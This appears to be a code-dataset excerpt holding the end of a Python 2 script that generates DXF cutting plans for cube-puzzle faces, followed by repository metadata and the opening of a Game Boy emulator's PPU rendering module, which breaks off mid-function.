assert y>=self.origin[1] and y<self.origin[1]+self.width,y
assert self.origin[2] == z,z
assert self.grid[x-self.origin[0]][y-self.origin[1]]
return (x-self.origin[0],y-self.origin[1])
elif self.direction == Direction.NEG_X:
assert self.origin[0]-1 == x,x
assert y<self.origin[1] and y>self.origin[1]-self.height-1,y
assert z<self.origin[2] and z>self.origin[2]-self.height-1,z
assert self.grid[self.origin[1]-y-1][self.origin[2]-z-1]
return (self.origin[1]-y-1,self.origin[2]-z-1)
elif self.direction == Direction.NEG_Y:
assert x<self.origin[0] and x>self.origin[0]-self.width-1,x
assert self.origin[1]-1 == y,y
assert z<self.origin[2] and z>self.origin[2]-self.height-1,z
assert self.grid[self.origin[0]-x-1][self.origin[2]-z-1]
return (self.origin[0]-x-1,self.origin[2]-z-1)
elif self.direction == Direction.NEG_Z:
assert x<self.origin[0] and x>self.origin[0]-self.width-1,x
assert y<self.origin[1] and y>self.origin[1]-self.height-1,y
assert self.origin[2]-1 == z,z
assert self.grid[self.origin[0]-x-1][self.origin[1]-y-1]
return (self.origin[0]-x-1,self.origin[1]-y-1)
else:
raise Exception, self.direction
def deleteCube(self, x, y, z):
try:
(x2,y2) = self._translateLocation(x,y,z)
self.grid[x2][y2] = False
except:
pass
def markNeighbour(self, other, x, y, z):
try:
(x2,y2) = self._translateLocation(x,y,z)
except:
return
if x2 == 0:
if (y2>0 and y2<self.height-1):
self.neighbour[0].add(other)
elif y2 == 0:
if (x2>0 and x2<self.width-1):
self.neighbour[1].add(other)
elif x2 == self.width-1:
if (y2>0 and y2<self.height-1):
self.neighbour[2].add(other)
elif y2 == self.height-1:
if (x2>0 and x2<self.width-1):
self.neighbour[3].add(other)
else:
pass
#raise Exception, (x2,y2, x,y,z, self.direction)
def _setChar(self, out, x,y, char):
out[y] = out[y][:x] + char + out[y][x+1:]
def printFace(self, path = []):
out = dict([(a, " "*((self.width*2)+1)) for a in range((self.height*2)+1)])
for x in range(len(self.grid)):
for y in range(len(self.grid[x])):
if self.grid[x][y]:
self._setChar(out, (x*2)+1, (y*2)+1, "T")
else:
self._setChar(out, (x*2)+1, (y*2)+1, "F")
if path!=[]:
for a in range(len(path)-1):
(x,y) = path[a]
(x2,y2) = path[a+1]
if y != y2:
assert x == x2,(path[a],path[a+1])
assert abs(y2-y) == 1,(path[a],path[a+1])
if y2<y:
y = y2
for b in range(3):
self._setChar(out, x*2, (y*2)+b, str(a)[-1])
else:
assert abs(x2-x) == 1,(x,x2)
if x2<x:
x = x2
for b in range(3):
self._setChar(out, (x*2)+b, y*2, str(a)[-1])
for y in sorted(out):
print out[y]
def drawNumber(self, char, x, y, width, height, layer, reverse = False):
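		# Renders the digit 'char' (0-9) as seven-segment-style strokes within the
		# given box; 'reverse' mirrors the side segments for faces laid out flipped.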
char = int(char)
assert char>=0 and char<=9, char
if char == 1:
return [sdxf.Line(points=[(x+width/2,y),(x+width/2,y+height)], layer=layer)]
ret = []
if char in [0,2,3,5,6,7,8,9]: # top bar
ret.append(sdxf.Line(points=[(x,y),(x+width,y)], layer=layer))
if char in [0,1,4,8,9] or (reverse and char in [2,3,7]) or (not reverse and char in [5,6]): # top-right
ret.append(sdxf.Line(points=[(x+width,y),(x+width,y+height/2)], layer=layer))
if char in [0,1,6,8] or (reverse and char in [3,4,5,7,9]) or (not reverse and char in [2]): # bottom-right
ret.append(sdxf.Line(points=[(x+width,y+height/2),(x+width,y+height)], layer=layer))
if char in [0,2,3,5,6,8,9]: # bottom bar
ret.append(sdxf.Line(points=[(x+width,y+height),(x,y+height)], layer=layer))
if char in [0,4,8,9] or (reverse and char in [5,6]) or (not reverse and char in [2,3,7]): # top-left
ret.append(sdxf.Line(points=[(x,y),(x,y+height/2)], layer=layer))
if char in [0,6,8] or (reverse and char in [2]) or (not reverse and char in [3,4,5,7,9]): # bottom-left
ret.append(sdxf.Line(points=[(x,y+height/2),(x,y+height)], layer=layer))
if char in [2,3,4,5,6,8,9]: # middle bar
ret.append(sdxf.Line(points=[(x,y+height/2),(x+width,y+height/2)], layer=layer))
return ret
def centredText(self, text,x,y,width,height, reverse=False, topspacing=None, bottomspacing = None):
spacing = (self.width-2.0)/24
if spacing < 0.25:
spacing = 0.25
if topspacing == None:
topspacing = spacing
else:
topspacing = spacing/topspacing
if bottomspacing == None:
bottomspacing = spacing
else:
bottomspacing = spacing/bottomspacing
#print "spacing", spacing
itemWidth = (width-((len(text)+1)*spacing))/len(text)
ret = []
if not reverse:
text = tuple(reversed(text))
for i in range(len(text)):
ret.extend(self.drawNumber(text[i], x+(i*(itemWidth+spacing))+spacing,y+topspacing,itemWidth,height-(topspacing+bottomspacing),layer="TEXT_LAYER", reverse = reverse))
return ret
def makeNumbers(self, reverse):
outline = []
# text spacing is 1/4 for the first item, 2/4 for the centre and 1/4 for the last
horizspace = (self.width-2.0)/3 # unit (i.e 1/4) for horizontal spacing. -2 to cope with notches
vertspace = (self.height-2.0)/3
print "width",self.width,horizspace,vertspace
outline.extend(self.centredText("%d"%self.index, 1+horizspace, 1+vertspace, horizspace, vertspace, reverse))
#assert [x for x in self.neighbour if x==None] == [],self.neighbour
#print self.index,[x.index for x in self.neighbour],self.colour, self.direction, reverse
def drawNeighbours(neighs, x,y):
if len(neighs) == 0:
return
space = vertspace/(1.0*len(neighs))
for (i,n) in enumerate(neighs):
if len(neighs)>1:
print "number", n.index, i, x,y+(i*space), space
if i != 0:
topspacing = len(neighs)
else:
topspacing = None
if i!=len(neighs)-1:
bottomspacing = len(neighs)
else:
bottomspacing = None
outline.extend(self.centredText("%d"%n.index, x, y+(i*space), horizspace, space, reverse, bottomspacing=bottomspacing, topspacing =topspacing))
drawNeighbours(self.neighbour[0], 1, 1+vertspace)
drawNeighbours(self.neighbour[1], 1+horizspace, 1)
drawNeighbours(self.neighbour[2], 1+(horizspace*2), 1+vertspace)
drawNeighbours(self.neighbour[3], 1+horizspace, 1+(vertspace*2))
return outline
def makeOutline(self, invert=False):
place = (0,0)
outline = []
# These pieces have their directions on the wrong side, so they need flipping
reverse = self.direction in [Direction.POS_Y, Direction.NEG_Z, Direction.NEG_X]
if invert:
reverse = not reverse
toTest = [place]
tested = []
neighbourSet = {place:self}
while len(toTest)>0:
point = toTest[0]
toTest = toTest[1:]
current = neighbourSet[point]
(x,y) = point
for value in range(len(current.neighbour)):
n = current.neighbour[value]
if len(n) == 0:
continue
for poss in n:
if poss in tested:
continue
if poss.direction!=current.direction:
continue
n = poss
break
else:
continue
print "neighbour", n
if value == 0:
if reverse:
newPoint = (x-self.width+1, y)
else:
newPoint = (x+self.width-1, y)
elif value == 1:
newPoint = (x, y+self.height-1)
elif value == 2:
if reverse:
newPoint = (x+self.width-1, y)
else:
newPoint = (x-self.width+1, y)
elif value == 3:
newPoint = (x, y-self.height+1)
neighbourSet[newPoint] = n
toTest.append(newPoint)
tested.append(current)
for point in neighbourSet:
thisOutline = []
(x,y) = point
current = neighbourSet[point]
pts = current.makeFaceOutline()
thisOutline.append(sdxf.LwPolyLine(points=pts))
thisOutline.extend(current.makeNumbers(reverse))
# rotate all the items 180 degrees so they're the right way up in QCad
for item in thisOutline:
if reverse: # except the reverse ones, which just want flipping
item.points = [(x+a,y-b+self.height) for (a,b) in item.points]
else:
item.points = [(x-a+self.width,y-b+self.height) for (a,b) in item.points]
outline.extend(thisOutline)
found = {}
for item in outline:
if not isinstance(item, sdxf.LwPolyLine):
continue
sequence = [tuple(sorted((item.points[a],item.points[a+1]))) for a in range(len(item.points)-1)]
for pair in sequence:
if pair not in found:
found[pair] = 1
else:
found[pair] +=1
for item in outline:
if not isinstance(item, sdxf.LwPolyLine):
continue
sequence = [(item.points[a],item.points[a+1]) for a in range(len(item.points)-1)]
sequence = [pair for pair in sequence if found[tuple(sorted(pair))]==1]
newpts = [[]]
for a in range(len(sequence)-1):
if sequence[a][1] == sequence[a+1][0]:
newpts[-1].append(sequence[a][0])
else:
newpts[-1].extend(sequence[a])
newpts.append([])
if len(newpts[0])==0:
continue
try:
newpts[-1].extend(sequence[-1])
except IndexError:
for pts in newpts:
print "pts",pts
print "item.points",item.points
print "sequence",sequence
raise
if len(newpts)>1 or newpts[0]!=item.points:
for pts in newpts:
print "pts",pts
print "item.points",item.points
print "sequence",sequence
#raise Exception
item.points = newpts[0]
for pts in newpts[1:]:
outline.append(sdxf.LwPolyLine(points=pts))
smallest = [0,0]
for item in outline:
for (x,y) in item.points:
if x<smallest[0]:
smallest[0] = x
if y<smallest[1]:
smallest[1] = y
offset = [-smallest[a] for a in range(2)]
size = [0,0]
for item in outline:
newpts = [list(p) for p in item.points]
for p in newpts:
p[0] += offset[0]
p[1] += offset[1]
for a in range(2):
size[a] = max(size[a], p[a])
item.points = newpts
print "size", size
return {"faces":neighbourSet.values(), "outline":outline, "size": size}
def makeFaceOutline(self):
#self.printFace()
x,y = 0,0
while not self.grid[x][y]:
#print "initial no good", x,y
x +=1
if x == self.width:
raise Exception, "Sanity failure, doesn't look like a valid piece"
#print "start",x,y,self.grid[x][y]
pts = []
while True:
#print x,y
if (x,y) in pts:
pts.append((x,y))
#print pts
#self.printFace(pts)
assert pts[0] == (x,y), (pts[0],x,y)
return pts
pts.append((x,y))
try:
if y<self.height and x<self.width and self.grid[x][y] and (y==0 or not self.grid[x][y-1]):
x +=1
#print "move right to", x,y
elif y<self.height and ((x>0 and x<self.width and not self.grid[x][y] and self.grid[x-1][y]) or (x == self.width and self.grid[x-1][y])):
y +=1
#print "move down to", x,y,
#if x<self.width-1:
# print self.grid[x][y-1],self.grid[x-1][y-1]
#else:
# print
elif x<self.width and ((y!=0 and self.grid[x][y-1] and not self.grid[x-1][y-1]) or (x == 0 and self.grid[x][y-1])):
y-=1
#print "move up to", x,y
elif x>0 and ((y<self.height and not self.grid[x-1][y]) or y == self.height):
x-=1
#print "move left to", x,y
else:
raise Exception
if x<0 or y<0:
raise Exception,(x,y)
except Exception:
print pts
self.printFace(pts)
raise
def cube_faces(space, topleft, cube_side):
(x,y,z) = topleft
(x2,y2,z2) = bottomright = (x+cube_side, y+cube_side, z+cube_side)
assert x<x2,(x,x2)
assert y<y2,(y,y2)
assert z<z2,(z,z2)
ret = []
ret.append(Face(Direction.POS_Z,x2-x,y2-y,topleft,space))
ret.append(Face(Direction.POS_X,y2-y,z2-z,topleft,space))
ret.append(Face(Direction.POS_Y,x2-x,z2-z,topleft,space))
ret.append(Face(Direction.NEG_Z,x2-x,y2-y,bottomright,space))
ret.append(Face(Direction.NEG_X,y2-y,z2-z,bottomright,space))
ret.append(Face(Direction.NEG_Y,x2-x,z2-z,bottomright,space))
return ret
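# Hedged usage sketch (Space is constructed the same way as in __main__
# below; not executed here):
#   space = Space([6, 6, 6], [1, 1, 1])
#   faces = cube_faces(space, (0, 0, 0), 6)
#   assert len(faces) == 6  # one Face per side of a single cube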
class CubeType(Enum):
Filled = 1
Empty = 2 # can be seen by an edge cube
HiddenEmpty = 3 # can't been seen by edge
def find_nonhidden_cubes(grid, x,y,z):
ret = []
if x>0 and grid[z][y][x-1] == CubeType.HiddenEmpty:
ret.append((x-1,y,z))
if x<len(grid[z][y])-1 and grid[z][y][x+1] == CubeType.HiddenEmpty:
ret.append((x+1,y,z))
if y>0 and grid[z][y-1] == CubeType.HiddenEmpty:
ret.append((x,y-1,z))
if y<len(grid[z])-1 and grid[z][y+1][x] == CubeType.HiddenEmpty:
ret.append((x,y+1,z))
if z>0 and grid[z-1][y][x] == CubeType.HiddenEmpty:
ret.append((x,y,z-1))
if z<len(grid)-1 and grid[z+1][y][x] == CubeType.HiddenEmpty:
ret.append((x,y,z+1))
return ret
def find_empty_cubes(cube_grid):
tocheck = []
ret = []
for z in range(len(cube_grid)):
plane = []
for y in range(len(cube_grid[z])):
row = []
for x in range(len(cube_grid[z][y])):
if cube_grid[z][y][x]:
row.append(CubeType.Filled)
elif x == 0 or x == len(cube_grid[z][y])-1 or y == 0 or y == len(cube_grid[z])-1 or z == 0 or z == len(cube_grid)-1:
row.append(CubeType.Empty)
tocheck.append((x,y,z))
else:
row.append(CubeType.HiddenEmpty)
plane.append(row)
ret.append(plane)
while len(tocheck)>0:
(x,y,z) = tocheck[0]
tocheck = tocheck[1:]
newempty = find_nonhidden_cubes(ret, x,y,z)
tocheck.extend(newempty)
for (x,y,z) in newempty:
ret[z][y][x] = CubeType.Empty
return ret
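# Worked example of the flood fill above (hypothetical 2x2x2 grid,
# True = filled, indexed [z][y][x]):
#   grid = [[[True, True], [True, False]],
#           [[True, True], [True, True]]]
#   res = find_empty_cubes(grid)
# The single empty cube lies on the grid boundary, so it is classified
# CubeType.Empty; only a fully enclosed hole would remain HiddenEmpty.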
class Plans(sdxf.Drawing):
def setup(self):
sdxf.Drawing.__init__(self)
self.used = [[False for y in range(self.sheet_size[1])] for x in range(self.sheet_size[0])]
for layer in self.layers:
if layer.name == "TEXT_LAYER":
break
else:
self.layers.append(sdxf.Layer(name="TEXT_LAYER", color=DXFColours.Blue.value()))
def __init__(self, sheet_size, file_pattern):
self.sheet_size = sheet_size
self.file_pattern = file_pattern
self.sheet_index = 0
self.setup()
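    # place() below scans the sheet left-to-right, top-to-bottom for the
    # first rectangle of the requested size whose cells are all free, marks
    # those cells used, then shifts every point in `items` by the chosen
    # (x, y) offset before extending the drawing.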
def place(self, items, size):
x,y = 0,0
while True:
            if y + size[1] > self.sheet_size[1]: # no vertical room left on this sheet, start a new one
self.saveas(self.file_pattern%self.sheet_index)
self.sheet_index +=1
self.setup()
x,y = 0,0
for x2 in range(x, min(self.sheet_size[0],x+size[0]+1)):
for y2 in range(y, min(self.sheet_size[1],y+size[1]+1)):
if self.used[x2][y2]:
x = x2+1
if self.sheet_size[0] < x+size[0]:
x = 0
y +=1
break
else:
                    continue # no used cell in this column; scan the next x2
break
else:
print "occupied", x,y, size
# found a space
for x2 in range(x, min(self.sheet_size[0],x+size[0]+1)):
for y2 in range(y, min(self.sheet_size[1],y+size[1]+1)):
self.used[x2][y2] = True
for item in items:
newpts = [list(p) for p in item.points]
for p in newpts:
p[0] += x
p[1] += y
item.points = newpts
self.extend(items)
break
def finished(self):
self.saveas(self.file_pattern%self.sheet_index)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-c","--cube-side",default=6,type="int",dest="cube_side",help="Number of unit lengths per cube side")
def size_callback(option, opt_str, value, parser):
items = value.split(",")
if len(items)!=2:
raise OptionValueError, "%s is an invalid sheet size"%value
try:
value = [int(x) for x in items]
except ValueError:
raise OptionValueError, "%s is an invalid sheet size"%value
setattr(parser.values, option.dest, value)
parser.add_option("-s","--sheet-size", default=(100,200),action="callback", callback=size_callback, nargs=1, dest="sheet_size",type="string")
parser.add_option("-r","--random-seed",default=None, dest="seed")
parser.add_option("-i","--invert-pieces",action="store_true",default=False,dest="invert",help="Generate pieces with instructions on the outside")
(opts,args) = parser.parse_args()
if opts.cube_side < 4:
parser.error("Cube sides must be at least 4")
if len(args)!=1:
parser.error("Need a specification file")
try:
data = file(args[0])
except IOError:
parser.error("Can't open '%s'"%args[0])
cube_grid = []
plane = []
for line in data.readlines():
line = line.strip()
if len(line)==0:
cube_grid.append(plane)
plane = []
else:
if [x for x in line if x not in ('*', '-')]!=[]:
parser.error("'%s' is an invalid row!"%line)
row = [x == '*' for x in line]
plane.append(row)
if plane!=[]:
cube_grid.append(plane)
random.seed(opts.seed)
if opts.sheet_size[0]<opts.cube_side:
parser.error("Sheet is less wide than the cube size!")
if opts.sheet_size[1]<opts.cube_side:
parser.error("Sheet is less long than the cube size!")
dimensions = [None,None,len(cube_grid)]
for plane in cube_grid:
if dimensions[1] == None:
dimensions[1] = len(plane)
else:
assert dimensions[1] == len(plane)
for row in plane:
if dimensions[0] == None:
dimensions[0] = len(row)
else:
assert dimensions[0] == len(row)
space = Space([a*opts.cube_side for a in dimensions], dimensions)
faces = []
grid = find_empty_cubes(cube_grid)
print grid
for z in range(len(cube_grid)):
for y in range(len(cube_grid[z])):
for x in range(len(cube_grid[z][y])):
if cube_grid[z][y][x]:
newfaces = cube_faces(space, (x*(opts.cube_side-1),y*(opts.cube_side-1),z*(opts.cube_side-1)), opts.cube_side)
for face in newfaces:
print face, face.index, face.direction
if face.direction == Direction.NEG_X and (x == len(cube_grid[z][y])-1 or grid[z][y][x+1] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.NEG_Y and (y == len(cube_grid[z])-1 or grid[z][y+1][x] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.NEG_Z and (z == len(cube_grid)-1 or grid[z+1][y][x] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.POS_X and (x == 0 or grid[z][y][x-1] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.POS_Y and (y == 0 or grid[z][y-1][x] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.POS_Z and (z == 0 or grid[z-1][y][x] == CubeType.Empty):
faces.append(face)
else:
print "skipping", face, face.direction
face.removeCubes()
blender = sdxf.Drawing()
space.fixCubes(opts.cube_side)
space.generateCubes(blender)
blender.saveas(args[0]+'-3d.dxf')
# reindex all of the faces as there's a few missing after the hidden-face removal
for newindex,face in enumerate(sorted(faces, key=operator.attrgetter("index"))):
face.index = newindex
plans = Plans(opts.sheet_size, args[0]+'-plans-%d.dxf')
facesDone = []
for face in sorted(faces, key=operator.attrgetter("index")):
#print face, face.colour
if face in facesDone:
continue
data = face.makeOutline(opts.invert)
plans.place(data["outline"], data["size"])
facesDone.extend(data["faces"])
plans.finished()
| [
"[email protected]"
] | |
358012077eb4c068106c8c7644d79efd8d5017d8 | 54d6109c8fc0aa4167eeee513163f05fc0d68775 | /vsgb/ppu.py | f810b1c269fca9778f74a01dc1c064ea0517446a | [] | no_license | AdrianoAzuos/vsgb | 2421dccb95c84250e782102ca0b0b1e05a653f5a | f9dc9a13c4dc91d42127a9f2aeaaee6cb152a9a2 | refs/heads/master | 2020-08-15T22:37:27.760549 | 2019-10-15T14:17:34 | 2019-10-15T14:17:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,428 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Documentation source:
# - https://gbdev.gg8.se/wiki/articles/Video_Display
from vsgb.byte_operations import signed_value
from vsgb.interrupt_manager import Interrupt, InterruptManager
from vsgb.io_registers import IO_Registers
from vsgb.mmu import MMU
from vsgb.window import Window
class PPU:
FRAMEBUFFER_SIZE = Window.SCREEN_WIDTH * Window.SCREEN_HEIGHT
H_BLANK_STATE = 0
V_BLANK_STATE = 1
OAM_READ_STATE = 2
VMRAM_READ_STATE = 3
OAM_SCANLINE_TIME = 80
VRAM_SCANLINE_TIME = 172
H_BLANK_TIME = 204
V_BLANK_TIME = 4560
def __init__(self, mmu : MMU, interruptManager : InterruptManager):
self.mmu = mmu
self.interruptManager = interruptManager
self.lcdControlRegister = LCDControlRegister(self.mmu)
self.framebuffer = [0xffffffff]*PPU.FRAMEBUFFER_SIZE
self.mode = PPU.V_BLANK_STATE
self.modeclock = 0
self.vblank_line = 0
self.auxillary_modeclock = 0
self.screen_enabled = True
self.window_line = 0
def step(self, cycles : int = 1):
self.vblank = False
self.modeclock += cycles
self.auxillary_modeclock += cycles
if self.lcdControlRegister.lcd_display_enable():
if self.screen_enabled:
if self.mode == PPU.H_BLANK_STATE:
if self.modeclock >= PPU.H_BLANK_TIME:
self.exec_hblank()
elif self.mode == PPU.V_BLANK_STATE:
self.exec_vblank()
elif self.mode == PPU.OAM_READ_STATE:
if self.modeclock >= PPU.OAM_SCANLINE_TIME:
self.exec_oam()
elif self.mode == PPU.VMRAM_READ_STATE:
if self.modeclock >= PPU.VRAM_SCANLINE_TIME:
self.exec_vram()
else:
self.screen_enabled = True
self.modeclock = 0
self.mode = 0
self.auxillary_modeclock = 0
self.window_line = 0
self.reset_current_line()
self.update_stat_mode()
self.compare_lylc()
else:
self.screen_enabled = False
def exec_vram(self):
self.modeclock -= PPU.VRAM_SCANLINE_TIME
self.mode = PPU.H_BLANK_STATE
self.scanline()
self.update_stat_mode()
def exec_oam(self):
self.modeclock -= PPU.OAM_SCANLINE_TIME
self.mode = PPU.VMRAM_READ_STATE
self.update_stat_mode()
def exec_hblank(self):
self.modeclock -= PPU.H_BLANK_TIME
self.mode = PPU.OAM_READ_STATE
self.next_line()
self.compare_lylc()
if self.current_line() == 144:
self.mode = PPU.V_BLANK_STATE
self.auxillary_modeclock = self.modeclock
self.vblank = True
self.window_line = 0
self.interruptManager.request_interrupt(Interrupt.INTERRUPT_VBLANK)
self.update_stat_mode()
def exec_vblank(self):
if self.auxillary_modeclock >= 456:
self.auxillary_modeclock -= 456
self.vblank_line += 1
if self.vblank_line <= 9:
self.next_line()
self.compare_lylc()
if self.modeclock >= PPU.V_BLANK_TIME:
self.modeclock -= PPU.V_BLANK_TIME
self.mode = PPU.OAM_READ_STATE
self.update_stat_mode()
self.reset_current_line()
self.vblank_line = 0
def scanline(self):
line = self.current_line()
        if line < 144:  # visible scanlines are 0-143; line 144 starts V-Blank
self.render_background(line)
self.render_window(line)
self.render_sprite(line)
def update_stat_mode(self):
# LCD Status Register
# FF41 - STAT - LCDC Status (R/W)
# -------------------------------
# Bit 6 - LYC=LY Coincidence Interrupt (1=Enable) (Read/Write)
# Bit 5 - Mode 2 OAM Interrupt (1=Enable) (Read/Write)
# Bit 4 - Mode 1 V-Blank Interrupt (1=Enable) (Read/Write)
# Bit 3 - Mode 0 H-Blank Interrupt (1=Enable) (Read/Write)
# Bit 2 - Coincidence Flag (0:LYC<>LY, 1:LYC=LY) (Read Only)
# Bit 1-0 - Mode Flag (Mode 0-3, see below) (Read Only)
# 0: During H-Blank
# 1: During V-Blank
# 2: During Searching OAM
# 3: During Transferring Data to LCD Driver
# The two lower STAT bits show the current status of the LCD controller.
        # The LCD controller operates on a 2^22 Hz = 4.194 MHz dot clock. An entire frame is 154 scanlines, 70224 dots, or 16.74 ms. On scanlines 0 through 143, the LCD controller cycles through modes 2, 3, and 0 once every 456 dots. Scanlines 144 through 153 are mode 1.
# The following are typical when the display is enabled:
# Mode 2 2_____2_____2_____2_____2_____2___________________2____
# Mode 3 _33____33____33____33____33____33__________________3___
# Mode 0 ___000___000___000___000___000___000________________000
# Mode 1 ____________________________________11111111111111_____
stat = self.mmu.read_byte(IO_Registers.STAT)
new_stat = (stat & 0xfc) | (self.mode & 0x3)
self.mmu.write_byte(IO_Registers.STAT, new_stat)
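        # Hedged read-back sketch of the bits written above (illustration
        # only, not used by the emulator itself):
        #   stat = self.mmu.read_byte(IO_Registers.STAT)
        #   mode = stat & 0x3          # 0=H-Blank, 1=V-Blank, 2=OAM, 3=VRAM
        #   lyc_coincidence = bool(stat & 0x4)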
def current_line(self):
return self.mmu.read_byte(IO_Registers.LY)
def reset_current_line(self):
self.mmu.write_byte(IO_Registers.LY, 0)
def next_line(self):
self.mmu.write_byte(IO_Registers.LY, self.current_line() + 1)
def rgb(self, color_code : int) -> int:
return {
0: 0xf0f0f0ff,
1: 0xc0d8a8ff,
2: 0x0090a8ff,
3: 0x000000ff
}.get(color_code)
def rgb_sprite(self, color_code : int) -> int:
return {
0: 0xf0f0f0ff,
1: 0xe8a0a0ff,
2: 0x806050ff,
3: 0x000000ff
}.get(color_code)
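    # Note on the palette maths in the render_* methods below: BGP/OBP pack
    # four 2-bit shades into one byte, so the shade of pixel value p is
    # (palette >> (p * 2)) & 0x3; e.g. the identity palette 0xE4 maps
    # 0->0, 1->1, 2->2, 3->3.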
def compare_lylc(self):
if self.lcdControlRegister.lcd_display_enable():
lyc = self.mmu.read_byte(IO_Registers.LYC)
stat = self.mmu.read_byte(IO_Registers.STAT)
if lyc == self.current_line():
stat = stat | 0x4
else:
stat = stat & 0xfb
self.mmu.write_byte(IO_Registers.STAT, stat)
def render_background(self, line : int):
line_width = (Window.SCREEN_HEIGHT - line -1) * Window.SCREEN_WIDTH
if self.lcdControlRegister.bg_window_display_priority():
# tile and map select
tiles_select = self.lcdControlRegister.bg_and_window_tile_data_select()
map_select = self.lcdControlRegister.bg_tile_map_display_select()
# x pixel offset
scx = self.mmu.read_byte(IO_Registers.SCX)
# y pixel offset
scy = self.mmu.read_byte(IO_Registers.SCY)
# line with y offset
line_adjusted = (line + scy) & 0xff
# get position of tile row to read
y_offset = int(line_adjusted / 8) * 32
# relative line number in tile
tile_line = line_adjusted % 8
# relative line number offset
tile_line_offset = tile_line * 2
palette = self.mmu.read_byte(IO_Registers.BGP)
x = 0
while x < 32:
tile = 0
if tiles_select == 0x8800:
tile = signed_value(self.mmu.read_byte(map_select + y_offset + x))
tile += 128
else:
tile = self.mmu.read_byte(map_select + y_offset + x)
line_pixel_offset = x * 8
tile_select_offset = tile * 16
tile_address = tiles_select + tile_select_offset + tile_line_offset
byte_1 = self.mmu.read_byte(tile_address)
byte_2 = self.mmu.read_byte(tile_address + 1)
pixelx = 0
buffer_addr = (line_pixel_offset - scx)
while pixelx < 8:
buffer_addr = buffer_addr & 0xff
shift = 0x1 << (7 - pixelx)
pixel = 1 if (byte_1 & shift > 0) else 0
pixel |= 2 if (byte_2 & shift > 0) else 0
color = (palette >> (pixel * 2)) & 0x3
pixelx += 1
if 0 <= buffer_addr < Window.SCREEN_WIDTH:
position = line_width + buffer_addr
self.framebuffer[position] = self.rgb(color)
buffer_addr = ( line_pixel_offset + pixelx - scx )
x += 1
else:
for i in range(0, Window.SCREEN_WIDTH):
self.framebuffer[line_width + i] = self.rgb(0)
def render_window(self, line : int):
line_width = (Window.SCREEN_HEIGHT - line -1) * Window.SCREEN_WIDTH
# dont render if the window is outside the bounds of the screen or
# if the LCDC window enable bit flag is not set
if self.window_line > 143 or not self.lcdControlRegister.window_display_enable():
return
window_pos_x = self.mmu.read_byte(IO_Registers.WX) - 7
window_pos_y = self.mmu.read_byte(IO_Registers.WY)
# don't render if the window is outside the bounds of the screen
if window_pos_x > 159 or window_pos_y > 143 or window_pos_y > line:
return
tiles_select = self.lcdControlRegister.bg_and_window_tile_data_select()
map_select = self.lcdControlRegister.window_tile_map_display_select()
line_adjusted = self.window_line
y_offset = int(line_adjusted / 8) * 32
tile_line = line_adjusted % 8
tile_line_offset = tile_line * 2
for x in range(0,32):
tile = 0
if tiles_select == 0x8800:
tile = signed_value(self.mmu.read_byte(map_select + y_offset + x))
tile += 128
else:
tile = self.mmu.read_byte(map_select + y_offset + x)
line_pixel_offset = x * 8
tile_select_offset = tile * 16
tile_address = tiles_select + tile_select_offset + tile_line_offset
byte_1 = self.mmu.read_byte(tile_address)
byte_2 = self.mmu.read_byte(tile_address + 1)
palette = self.mmu.read_byte(IO_Registers.BGP)
for pixelx in range(0,8):
buffer_addr = line_pixel_offset + pixelx + window_pos_x
if buffer_addr < 0 or buffer_addr >= Window.SCREEN_WIDTH:
continue
shift = 0x1 << (7 - pixelx)
pixel = 0
if (byte_1 & shift == shift) and (byte_2 & shift == shift):
pixel = 3
elif (byte_1 & shift == 0x0) and (byte_2 & shift == shift):
pixel = 2
elif (byte_1 & shift == shift) and (byte_2 & shift == 0x0):
pixel = 1
elif (byte_1 & shift == 0x0) and (byte_2 & shift == 0x00):
pixel = 0
position = line_width + buffer_addr
color = (palette >> (pixel * 2)) & 0x3
self.framebuffer[position] = self.rgb(color)
self.window_line += 1
def render_sprite(self, line : int):
line_width = (Window.SCREEN_HEIGHT - line -1) * Window.SCREEN_WIDTH
if not self.lcdControlRegister.sprite_display_enable():
return
sprite_size = self.lcdControlRegister.sprite_size()
for sprite in range(39,-1,-1):
sprite_offset = sprite * 4
sprite_y = self.mmu.read_byte(0xfe00 + sprite_offset) - 16
if sprite_y > line or (sprite_y + sprite_size) <= line:
continue
sprite_x = self.mmu.read_byte(0xfe00 + sprite_offset + 1) - 8
if sprite_x < -7 or sprite_x >= Window.SCREEN_WIDTH:
continue
sprite_tile_offset = (self.mmu.read_byte(0xfe00 + sprite_offset + 2) & (0xfe if sprite_size == 16 else 0xff)) * 16
# Attributes/Flags:
# Bit7 OBJ-to-BG Priority (0=OBJ Above BG, 1=OBJ Behind BG color 1-3)
# (Used for both BG and Window. BG color 0 is always behind OBJ)
# Bit6 Y flip (0=Normal, 1=Vertically mirrored)
# Bit5 X flip (0=Normal, 1=Horizontally mirrored)
# Bit4 Palette number **Non CGB Mode Only** (0=OBP0, 1=OBP1)
# Bit3 Tile VRAM-Bank **CGB Mode Only** (0=Bank 0, 1=Bank 1)
# Bit2-0 Palette number **CGB Mode Only** (OBP0-7)
sprite_flags = self.mmu.read_byte(0xfe00 + sprite_offset + 3)
priority = sprite_flags & 0x80 != 0x80
x_flip = sprite_flags & 0x20 == 0x20
y_flip = sprite_flags & 0x40 == 0x40
palette = sprite_flags & 0b00010000
tiles = 0x8000
pixel_y = (15 if sprite_size == 16 else 7) - (line - sprite_y) if y_flip else line - sprite_y
pixel_y_2 = 0
offset = 0
if sprite_size == 16 and (pixel_y >= 8):
pixel_y_2 = (pixel_y - 8) * 2
offset = 16
else:
pixel_y_2 = pixel_y * 2
tile_address = tiles + sprite_tile_offset + pixel_y_2 + offset
byte_1 = self.mmu.read_byte(tile_address)
byte_2 = self.mmu.read_byte(tile_address + 1)
obp0 = self.mmu.read_byte(IO_Registers.OBP0)
obp1 = self.mmu.read_byte(IO_Registers.OBP1)
if palette == 0:
palette = obp0
else:
palette = obp1
for pixelx in range(0,8):
shift = 0x1 << (pixelx if x_flip else 7 - pixelx)
pixel = 0
if (byte_1 & shift == shift) and (byte_2 & shift == shift):
pixel = 3
elif (byte_1 & shift == 0x0) and (byte_2 & shift == shift):
pixel = 2
elif (byte_1 & shift == shift) and (byte_2 & shift == 0x0):
pixel = 1
elif (byte_1 & shift == 0x0) and (byte_2 & shift == 0x00):
continue
buffer_x = sprite_x + pixelx
